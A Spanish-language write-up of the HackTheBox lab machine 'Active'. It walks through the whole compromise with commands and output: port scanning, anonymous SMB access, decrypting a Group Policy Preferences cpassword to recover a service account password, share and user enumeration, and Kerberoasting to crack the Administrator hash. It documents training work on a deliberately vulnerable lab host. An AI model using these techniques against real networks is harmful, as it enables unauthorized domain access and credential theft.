HackTheBox Active
❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.10.100 -oG port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:37 EDT
Initiating SYN Stealth Scan at 11:37
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49165/tcp open unknown syn-ack ttl 127Realizaremos un escaneo sobre los puertos abiertos de la máquina Active.
❯ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158,49165 10.10.10.100 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:39 EDT
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 11:40 (0:00:18 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-21 10:10:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -5h29m28s
| smb2-time:
| date: 2025-04-21T10:11:17
|_ start_date: 2025-04-20T17:58:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.92 secondsNmap para intenter ver vulnerabilidades y versiones sobre los puertos abiertos encontrados.
ldapsearch
❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep defaultNamingContext
defaultNamingContext: DC=active,DC=htb
❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep ldapServiceName
ldapServiceName: active.htb:dc$@ACTIVE.HTBComprobaremos el nombre del domninio.
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.100 active.htb
Añadimos el dominio al /etc/hosts.
❯ enum4linux -a -u "" -p "" 10.10.10.100
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/AObservamos que podemos acceder al recurso Replication.
❯ smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
Accedemos activamos y nos descargamos todo lo que encontremos.
❯ cat Groups.xml
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Groups.xml
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ <?xml version="1.0" encoding="utf-8"?>
2 │ <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" chang
│ ed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOw
│ hZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userN
│ ame="active.htb\SVC_TGS"/></User>
3 │ </Groups>
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ pwd
/home/kali/Desktop/HackTheBox/Active/content/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
Verificaremos la existencia de un archivo .xml asociado a una política de Grupo, el cual contiene información de un usuario de Active Directory. Este archivo incluye un campo denominado cpasswd, que está cifrado utilizando una clave conocida que forma parte de la configuración predeterminada de las Políticas de Preferencias de Grupo de Windows (GPP).
❯ impacket-Get-GPPPassword -xmlfile Groups.xml 'LOCAL'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Found a Groups XML file:
[*] file : Groups.xml
[*] newName :
[*] userName : active.htb\SVC_TGS
[*] password : GPPstillStandingStrong2k18
[*] changed : 2018-07-18 20:46:06
❯ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18Para descifrar este valor, podemos utilizar herramientas como gpp-decrypt o impacket-Get-GPPPassword.
❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.100 445 DC Administrator 2018-07-18 19:06:40 0 Built-in account for administering the computer/domain
SMB 10.10.10.100 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.100 445 DC krbtgt 2018-07-18 18:50:36 0 Key Distribution Center Service Account
SMB 10.10.10.100 445 DC SVC_TGS 2018-07-18 20:14:38 0
SMB 10.10.10.100 445 DC [*] Enumerated 4 local users: ACTIVEEnumeramos recursos compartidos y y usuarios activos.
❯ smbclient //10.10.10.100/Users -U active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 266824 blocks available
smb: \> cd SVC_TGS/Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Apr 20 13:59:50 2025
5217023 blocks of size 4096. 266824 blocks available
smb: \SVC_TGS\Desktop\> get user.txtNos conectamos y tenemos la primera bandera la user.txt.
Privilege Escalation
❯ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -requestProcedemos a realizar un ataque de Kerberoasting con el objetivo de identificar servicios en el dominio active.htb que estén asociados a cuentas de usuario. Este ataque nos permite solicitar tickets de servicio Kerberos (TGS) para dichos servicios, los cuales pueden ser crackeados offline con el fin de recuperar las contraseñas en texto claro de las cuentas vinculadas.
Como resultado, se obtuvo un hash Kerberos (KRB5-TGS) correspondiente a la cuenta Administrator.
Guardamos el hash obtenido.
Crackeamos y tenemos la contraseña del administrador.
Y maquina resuelta.
Última actualización
